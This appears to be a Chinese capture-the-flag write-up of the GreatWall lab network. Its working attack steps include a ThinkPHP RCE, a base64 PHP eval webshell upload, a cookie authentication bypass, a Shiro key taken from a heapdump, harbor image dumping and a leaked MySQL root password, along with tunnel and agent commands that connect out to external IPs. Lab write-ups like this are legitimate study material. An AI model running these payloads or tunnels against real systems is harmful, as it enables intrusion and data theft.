春秋云境还是太贵了!!
春秋云境-GreatWall
首先扫描端口,发现8080存活
然后thinkphp一把梭

拿到了第一个shell
然后上传到目录
但是很快发现在这个目录下不能完全执行
后来想起来原来是蚁剑的不是纯交互式终端
重新fscan扫描一下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
| ┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-03-08 20:54:25] [INFO] 暴力破解线程数: 1
[2025-03-08 20:54:25] [INFO] 开始信息扫描
[2025-03-08 20:54:25] [INFO] CIDR范围: 172.28.23.0-172.28.23.255
[2025-03-08 20:54:25] [INFO] 生成IP范围: 172.28.23.0.%!d(string=172.28.23.255) - %!s(MISSING).%!d(MISSING)
[2025-03-08 20:54:25] [INFO] 解析CIDR 172.28.23.17/24 -> IP范围 172.28.23.0-172.28.23.255
[2025-03-08 20:54:25] [INFO] 最终有效主机数量: 256
[2025-03-08 20:54:25] [INFO] 开始主机扫描
[2025-03-08 20:54:25] [INFO] 正在尝试无监听ICMP探测...
[2025-03-08 20:54:26] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-03-08 20:54:26] [INFO] 切换为PING方式探测...
[2025-03-08 20:54:26] [SUCCESS] 目标 172.28.23.26 存活 (ICMP)
[2025-03-08 20:54:26] [SUCCESS] 目标 172.28.23.33 存活 (ICMP)
[2025-03-08 20:54:26] [SUCCESS] 目标 172.28.23.17 存活 (ICMP)
[2025-03-08 20:54:32] [INFO] 存活主机数量: 3
[2025-03-08 20:54:32] [INFO] 有效端口数量: 233
[2025-03-08 20:54:32] [SUCCESS] 端口开放 172.28.23.17:80
[2025-03-08 20:54:32] [SUCCESS] 端口开放 172.28.23.33:22
[2025-03-08 20:54:32] [SUCCESS] 端口开放 172.28.23.26:22
[2025-03-08 20:54:32] [SUCCESS] 端口开放 172.28.23.26:21
[2025-03-08 20:54:32] [SUCCESS] 端口开放 172.28.23.17:22
[2025-03-08 20:54:32] [SUCCESS] 端口开放 172.28.23.26:80
[2025-03-08 20:54:32] [SUCCESS] 端口开放 172.28.23.33:8080
[2025-03-08 20:54:32] [SUCCESS] 端口开放 172.28.23.17:8080
[2025-03-08 20:54:32] [SUCCESS] 服务识别 172.28.23.33:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.10 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.10.]
[2025-03-08 20:54:32] [SUCCESS] 服务识别 172.28.23.26:22 => [ssh] 版本:7.2p2 Ubuntu 4ubuntu2.10 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10.]
[2025-03-08 20:54:32] [SUCCESS] 服务识别 172.28.23.26:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-03-08 20:54:32] [SUCCESS] 服务识别 172.28.23.17:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.7.]
[2025-03-08 20:54:37] [SUCCESS] 服务识别 172.28.23.17:8080 => [http]
[2025-03-08 20:54:37] [SUCCESS] 服务识别 172.28.23.33:8080 => [http]
[2025-03-08 20:54:38] [SUCCESS] 服务识别 172.28.23.17:80 => [http]
[2025-03-08 20:54:38] [SUCCESS] 服务识别 172.28.23.26:80 => [http]
[2025-03-08 20:54:38] [INFO] 存活端口数量: 8
[2025-03-08 20:54:38] [INFO] 开始漏洞扫描
[2025-03-08 20:54:38] [INFO] 加载的插件: ftp, ssh, webpoc, webtitle
[2025-03-08 20:54:38] [SUCCESS] 网站标题 http://172.28.23.17 状态码:200 长度:10887 标题:""
[2025-03-08 20:54:38] [SUCCESS] 网站标题 http://172.28.23.17:8080 状态码:200 长度:1027 标题:Login Form
[2025-03-08 20:54:38] [SUCCESS] 网站标题 http://172.28.23.26 状态码:200 长度:13693 标题:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[2025-03-08 20:54:38] [SUCCESS] 网站标题 http://172.28.23.33:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://172.28.23.33:8080/login;jsessionid=C0147F5D5100AFE63969477D86B84D8F
[2025-03-08 20:54:38] [SUCCESS] 匿名登录成功!
[2025-03-08 20:54:39] [SUCCESS] 网站标题 http://172.28.23.33:8080/login;jsessionid=C0147F5D5100AFE63969477D86B84D8F 状态码:200 长度:3860 标题:智联科技 ERP 后台登陆
[2025-03-08 20:54:39] [SUCCESS] 目标: http://172.28.23.17:8080
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息:
links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[2025-03-08 20:54:40] [SUCCESS] 目标: http://172.28.23.33:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-03-08 20:54:40] [SUCCESS] 目标: http://172.28.23.33:8080
漏洞类型: poc-yaml-springboot-env-unauth
漏洞名称: spring2
详细信息:
links:https://github.com/LandGrey/SpringBootVulExploit
|
然后将流量代理出来
1
2
| python neoreg.py -k shell -p 8888 -u http://8.130.71.207:8080/tunnel.php
python3 neoreg.py -k shell -u http://39.101.64.150:8080/tunnel.php
|
1
| python dirsearch.py -u http://172.28.23.33:8080 --proxy socks5://127.0.0.1:8888
|
结合一下,很明显是heapdump
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
| PS D:\CTFtools\Web\dirsearch-0.4.3\dirsearch-0.4.3\dirsearch-0.4.3> python dirsearch.py -u http://172.28.23.33:8080 --proxy socks5://127.0.0.1:8888
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: D:\CTFtools\Web\dirsearch-0.4.3\dirsearch-0.4.3\dirsearch-0.4.3\reports\http_172.28.23.33_8080\_25-03-08_21-30-38.txt
Target: http://172.28.23.33:8080/
[21:30:38] Starting:
[21:31:09] 404 - 96B - /;/login
[21:31:10] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[21:31:12] 400 - 435B - /a%5c.aspx
[21:31:15] 404 - 111B - /actuator/;/auditevents
[21:31:15] 200 - 2KB - /actuator
[21:31:15] 404 - 108B - /actuator/;/auditLog
[21:31:15] 404 - 105B - /actuator/;/beans
[21:31:15] 404 - 106B - /actuator/;/caches
[21:31:15] 404 - 110B - /actuator/;/conditions
[21:31:15] 404 - 111B - /actuator/;/configprops
[21:31:15] 404 - 121B - /actuator/;/configurationMetadata
[21:31:15] 404 - 104B - /actuator/;/dump
[21:31:15] 404 - 103B - /actuator/;/env
[21:31:15] 404 - 124B - /actuator/;/exportRegisteredServices
[21:31:15] 404 - 106B - /actuator/;/events
[21:31:15] 404 - 108B - /actuator/;/features
[21:31:15] 404 - 106B - /actuator/;/flyway
[21:31:15] 404 - 111B - /actuator/;/healthcheck
[21:31:15] 404 - 106B - /actuator/;/health
[21:31:15] 404 - 108B - /actuator/;/heapdump
[21:31:15] 404 - 107B - /actuator/;/jolokia
[21:31:15] 404 - 104B - /actuator/;/info
[21:31:15] 404 - 116B - /actuator/;/integrationgraph
[21:31:15] 404 - 109B - /actuator/;/httptrace
[21:31:15] 404 - 109B - /actuator/;/liquibase
[21:31:15] 404 - 107B - /actuator/;/logfile
[21:31:15] 404 - 107B - /actuator/;/metrics
[21:31:15] 404 - 107B - /actuator/;/loggers
[21:31:15] 404 - 108B - /actuator/;/mappings
[21:31:15] 404 - 118B - /actuator/;/registeredServices
[21:31:15] 404 - 110B - /actuator/;/prometheus
[21:31:15] 404 - 107B - /actuator/;/refresh
[21:31:15] 404 - 113B - /actuator/;/loggingConfig
[21:31:15] 404 - 117B - /actuator/;/releaseAttributes
[21:31:15] 404 - 117B - /actuator/;/resolveAttributes
[21:31:15] 404 - 114B - /actuator/;/scheduledtasks
[21:31:15] 404 - 108B - /actuator/;/sessions
[21:31:15] 404 - 108B - /actuator/;/shutdown
[21:31:15] 404 - 113B - /actuator/;/springWebflow
[21:31:15] 404 - 103B - /actuator/;/sso
[21:31:15] 404 - 111B - /actuator/;/ssoSessions
[21:31:15] 404 - 110B - /actuator/;/statistics
[21:31:15] 404 - 106B - /actuator/;/status
[21:31:15] 404 - 110B - /actuator/;/threaddump
[21:31:15] 404 - 105B - /actuator/;/trace
[21:31:15] 404 - 106B - /actuator/auditLog
[21:31:15] 404 - 109B - /actuator/auditevents
[21:31:15] 200 - 20B - /actuator/caches
[21:31:15] 200 - 91KB - /actuator/beans
[21:31:15] 404 - 102B - /actuator/dump
[21:31:15] 404 - 119B - /actuator/configurationMetadata
[21:31:15] 200 - 7KB - /actuator/env
[21:31:15] 200 - 99KB - /actuator/conditions
[21:31:15] 404 - 122B - /actuator/exportRegisteredServices
[21:31:15] 404 - 104B - /actuator/events
[21:31:15] 404 - 104B - /actuator/flyway
[21:31:15] 404 - 106B - /actuator/features
[21:31:15] 404 - 112B - /actuator/gateway/routes
[21:31:16] 404 - 109B - /actuator/healthcheck
[21:31:16] 200 - 167B - /actuator/health
[21:31:16] 404 - 107B - /actuator/liquibase
[21:31:16] 404 - 105B - /actuator/logfile
[21:31:16] 200 - 50KB - /actuator/loggers
[21:31:16] 404 - 111B - /actuator/loggingConfig
[21:31:16] 404 - 108B - /actuator/management
[21:31:16] 200 - 22KB - /actuator/mappings
[21:31:16] 200 - 1018B - /actuator/metrics
[21:31:16] 404 - 116B - /actuator/registeredServices
[21:31:16] 404 - 115B - /actuator/releaseAttributes
[21:31:16] 404 - 106B - /actuator/sessions
[21:31:16] 404 - 105B - /actuator/refresh
[21:31:16] 404 - 111B - /actuator/springWebflow
[21:31:16] 404 - 115B - /actuator/resolveAttributes
[21:31:16] 404 - 106B - /actuator/shutdown
[21:31:16] 404 - 108B - /actuator/prometheus
[21:31:16] 200 - 54B - /actuator/scheduledtasks
[21:31:16] 404 - 101B - /actuator/sso
[21:31:16] 404 - 109B - /actuator/ssoSessions
[21:31:16] 404 - 112B - /actuator/hystrix.stream
[21:31:16] 404 - 107B - /actuator/httptrace
[21:31:16] 200 - 2B - /actuator/info
[21:31:16] 200 - 85KB - /actuator/threaddump
[21:31:16] 404 - 114B - /actuator/integrationgraph
[21:31:16] 404 - 105B - /actuator/jolokia
[21:31:16] 404 - 108B - /actuator/statistics
[21:31:16] 200 - 14KB - /actuator/configprops
[21:31:16] 404 - 104B - /actuator/status
[21:31:17] 404 - 103B - /actuator/trace
[21:31:17] 200 - 27MB - /actuator/heapdump
|
解密一下heapdump,只保留了关键部分
1
2
3
4
5
6
7
| D:\CTFtools\工具包--天狐渗透V1.2\gui_scan\heapdump>java -jar JDumpSpider-1.1-SNAPSHOT-full.jar C:\Users\14301\Desktop\heapdump.heapdump
===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES
===========================================
|
找到了密钥和利用链,但是目前的用户是ops01
注入哥斯拉内存马
设置代理进行连接
然后在/home/ops01下发现了文件
由于不熟悉pwn,这一部分不做赘述,只说一个小点
在exp前面加上这一段设置为你做的代理即可
1
2
| socks.set_default_proxy(socks.SOCKS5, "127.0.0.1", 1080)
socket.socket = socks.socksocket
|
现在开始看新翔OA,依据之前的扫描结果21端口开放得到相关源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| root@joker:/home/Work# proxychains ftp 172.28.23.26
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.28.23.26:21-<><>-OK
Connected to 172.28.23.26.
220 (vsFTPd 3.0.3)
Name (172.28.23.26:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> dir
227 Entering Passive Mode (172,28,23,26,21,118).
|S-chain|-<>-127.0.0.1:1080-<><>-172.28.23.26:5494-<><>-OK
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 7536672 Mar 23 2024 OASystem.zip
ftp> get OASystem.zip
local: OASystem.zip remote: OASystem.zip
227 Entering Passive Mode (172,28,23,26,179,32).
|S-chain|-<>-127.0.0.1:1080-<><>-172.28.23.26:45856-<><>-OK
150 Opening BINARY mode data connection for OASystem.zip (7536672 bytes).
226 Transfer complete.
500 Unknown command.
7536672 bytes received in 147.92 secs (49.7565 kB/s)
ftp> exit
221 Goodbye.
|
然后得到源码,重点关注开头的引用文件
发现逻辑相对简单
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| <?php
function islogin(){
if(isset($_COOKIE['id'])&&isset($_COOKIE['loginname'])&&isset($_COOKIE['jueseid'])&&isset($_COOKIE['danweiid'])&&isset($_COOKIE['quanxian'])){
if($_COOKIE['id']!=''&&$_COOKIE['loginname']!=''&&$_COOKIE['jueseid']!=''&&$_COOKIE['danweiid']!=''&&$_COOKIE['quanxian']!=''){
return true;
}
else {
return false;
}
}
else {
return false;
}
}
?>
|
直接添加cookie就行
1
| id=1;loginname=1;jueseid=1;danweiid=1;quanxian=1
|
然后开始发现在uploadbase64.php下可以任意上传文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| <?php
/**
* Description: PhpStorm.
* Author: yoby
* DateTime: 2018/12/4 18:01
* Email:logove@qq.com
* Copyright Yoby版权所有
*/
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
$type = ".".$result[2];
$path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img = base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');
|
然后准备一下payload
1
| imgbase64=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydhdHRhY2snXSk7Pz4=
|
设置一下bp的socks代理
再正常抓包即可
上传成功开始连接
很明显禁用了很多
另外这里使用插件绕过
但是发现post的无法执行,只能使用Get的
1
| /upload/.antproxy.php?pass=system(%22find%20/%20-perm%20-u=s%20-type%20f%202%3E/dev/null%22);
|
这里发现有suid提权
使用base32
1
| /.antproxy.php?pass=system("base32 /flag02.txt");
|
分别开始在查看网卡,进行扫描
在ERP的这台机子上发现还有一个网卡
1
| ./fscan -h 172.22.10.0/24 > result
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
| ┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-03-09 11:45:20] [INFO] 暴力破解线程数: 1
[2025-03-09 11:45:20] [INFO] 开始信息扫描
[2025-03-09 11:45:20] [INFO] CIDR范围: 172.22.10.0-172.22.10.255
[2025-03-09 11:45:20] [INFO] 生成IP范围: 172.22.10.0.%!d(string=172.22.10.255) - %!s(MISSING).%!d(MISSING)
[2025-03-09 11:45:20] [INFO] 解析CIDR 172.22.10.0/24 -> IP范围 172.22.10.0-172.22.10.255
[2025-03-09 11:45:20] [INFO] 最终有效主机数量: 256
[2025-03-09 11:45:20] [INFO] 开始主机扫描
[2025-03-09 11:45:20] [INFO] 正在尝试无监听ICMP探测...
[2025-03-09 11:45:20] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-03-09 11:45:20] [INFO] 切换为PING方式探测...
[2025-03-09 11:45:21] [SUCCESS] 目标 172.22.10.16 存活 (ICMP)
[2025-03-09 11:45:21] [SUCCESS] 目标 172.22.10.28 存活 (ICMP)
[2025-03-09 11:45:26] [INFO] 存活主机数量: 2
[2025-03-09 11:45:27] [INFO] 有效端口数量: 233
[2025-03-09 11:45:27] [SUCCESS] 端口开放 172.22.10.28:80
[2025-03-09 11:45:27] [SUCCESS] 端口开放 172.22.10.28:22
[2025-03-09 11:45:27] [SUCCESS] 端口开放 172.22.10.16:22
[2025-03-09 11:45:27] [SUCCESS] 端口开放 172.22.10.28:3306
[2025-03-09 11:45:27] [SUCCESS] 端口开放 172.22.10.16:8080
[2025-03-09 11:45:27] [SUCCESS] 服务识别 172.22.10.28:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.10 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.10.]
[2025-03-09 11:45:27] [SUCCESS] 服务识别 172.22.10.16:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.10 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.10.]
[2025-03-09 11:45:27] [SUCCESS] 服务识别 172.22.10.28:3306 => [mysql] 版本:8.0.36-0ubuntu0.20.04.1 产品:MySQL Banner:[[.8.0.36-0ubuntu0.20.04.1.V;{xY ^.0 W]En: 8uB caching_sha2_password]
[2025-03-09 11:45:32] [SUCCESS] 服务识别 172.22.10.28:80 => [http] 版本:1.25.4 产品:nginx
[2025-03-09 11:45:32] [SUCCESS] 服务识别 172.22.10.16:8080 => [http]
[2025-03-09 11:45:32] [INFO] 存活端口数量: 5
[2025-03-09 11:45:32] [INFO] 开始漏洞扫描
[2025-03-09 11:45:32] [INFO] 加载的插件: mysql, ssh, webpoc, webtitle
[2025-03-09 11:45:32] [SUCCESS] 网站标题 http://172.22.10.28 状态码:200 长度:1975 标题:DooTask
[2025-03-09 11:45:32] [SUCCESS] 网站标题 http://172.22.10.16:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.10.16:8080/login;jsessionid=EFB0A9532795C590DF70C9E786D5D5E4
[2025-03-09 11:45:32] [SUCCESS] 网站标题 http://172.22.10.16:8080/login;jsessionid=EFB0A9532795C590DF70C9E786D5D5E4 状态码:200 长度:3860 标题:智联科技 ERP 后台登陆
[2025-03-09 11:45:33] [SUCCESS] 目标: http://172.22.10.16:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-03-09 11:45:34] [SUCCESS] 目标: http://172.22.10.16:8080
漏洞类型: poc-yaml-springboot-env-unauth
漏洞名称: spring2
详细信息:
links:https://github.com/LandGrey/SpringBootVulExploit
|
接着开始搭建多层代理
1
2
3
| ./linux_x64_admin -l 1234 -s 1234
./linux_x64_agent -c 62.234.111.84:1234 -s 1234 --reconnect 8
./linux_x64_agent -c 172.28.23.17:8777 -s 1234 --reconnect 8
|
socks隧道启动
1
2
3
4
| (node 0) >> socks 1235
[*] Trying to listen on 0.0.0.0:1235......
[*] Waiting for agent's response......
[*] Socks start successfully!
|
目前拿到的这台是ERP,同样需要先进行扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| / >ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:05:ba:7c brd ff:ff:ff:ff:ff:ff
inet 172.28.23.33/16 brd 172.28.255.255 scope global dynamic eth0
valid_lft 1892156851sec preferred_lft 1892156851sec
inet6 fe80::216:3eff:fe05:ba7c/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:05:ba:7e brd ff:ff:ff:ff:ff:ff
inet 172.22.10.16/24 brd 172.22.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe05:ba7e/64 scope link
valid_lft forever preferred_lft forever
|
并在http://172.22.14.46/
上发现了一台harbor
使用404tk/CVE-2022-46463: harbor unauthorized detection下载镜像
1
2
| python3 harbor.py http://172.22.14.46/
python3 harbor.py http://172.22.14.46/ --dump harbor/secret --v2
|
然后在另外一个镜像中找到了
1
| python3 harbor.py http://172.22.14.46/ --dump project/projectadmin --v2
|
反编译后得到
1
2
3
4
5
6
7
| spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
mybatis.type-aliases-package=com.smartlink.projectadmin.entity
mybatis.mapper-locations=classpath:mybatis/mapper/*.xml
|
MDUT一把梭,但是extend版的怎么都连接不上
最后一台机子是一个k8s,但是不知道为什么怎么都无法访问